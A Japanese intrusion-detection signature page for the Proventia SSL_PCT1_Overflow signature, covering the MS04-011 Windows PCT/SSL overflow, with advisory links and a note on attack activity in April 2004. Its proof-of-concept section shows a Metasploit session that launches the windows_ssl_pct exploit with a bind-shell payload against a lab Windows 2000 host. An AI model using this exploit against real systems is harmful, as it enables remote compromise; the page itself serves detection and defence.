【Proventia】SSL_PCT1_Overflow

■コメント

2004年4月30日にこの脆弱性を利用した攻撃の増加を検知していました。

http://www.cyberpolice.go.jp/important/2004/20040430_084140.html


■シグネチャの説明

http://www.iss.net/security_center/static/12380.php

http://www.isskk.co.jp/support/techinfo/general/MS_SSL_168.html


■実証コード

・コード:広く一般に公開されております。


msf windows_ssl_pct(win32_bind) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ --------------- ------------------------------------
-
required RHOST 192.168.221.180 The target address
required RPORT 443 The target port
optional PROTO raw The application protocol (raw or smt
)

Payload: Name Default Description
-------- -------- ------- ------------------------------------------

required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell

Target: Windows 2000 SP0

msf windows_ssl_pct(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit target Windows 2000 SP0
[*] Sending 376 bytes to remote host.
[*] Waiting for a response...
[*] Exiting Bind Handler.


■Proveintaでの検知

SSL_PCT1_Overflow


■参考資料

Microsoft Security Bulletin MS04-011
Security Update for Microsoft Windows (835732)
http://www.microsoft.com/technet/security/bulletin/ms04-011.mspx

Internet Security Systems Security Advisory, April 13, 2004
Microsoft SSL Library Remote Compromise Vulnerability
http://xforce.iss.net/xforce/alerts/id/168

CIAC Information Bulletin O-114
Microsoft Security Update for Microsoft Windows
http://www.ciac.org/ciac/bulletins/o-114.shtml

CERT Vulnerability Note VU#586540
Microsoft Private Communication Technology (PCT) fails to properly validate message inputs
http://www.kb.cert.org/vuls/id/586540

SecuriTeam Mailing List, Windows focus 22 Apr 2004
Microsoft SSL Library Remote Compromise Vulnerability (MS04-011, Exploit)
http://www.securiteam.com/windowsntfocus/5CP0L0KCKO.html

Internet Security Systems Security Alert, April 13, 2004
Multiple Vulnerabilities in Microsoft Products
http://xforce.iss.net/xforce/alerts/id/169

CIAC Information Bulletin O-114
Microsoft Security Update for Microsoft Windows [REVISED 25 Jun 2004]
http://www.ciac.org/ciac/bulletins/o-114.shtml

CVE
CVE-2003-0719
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0719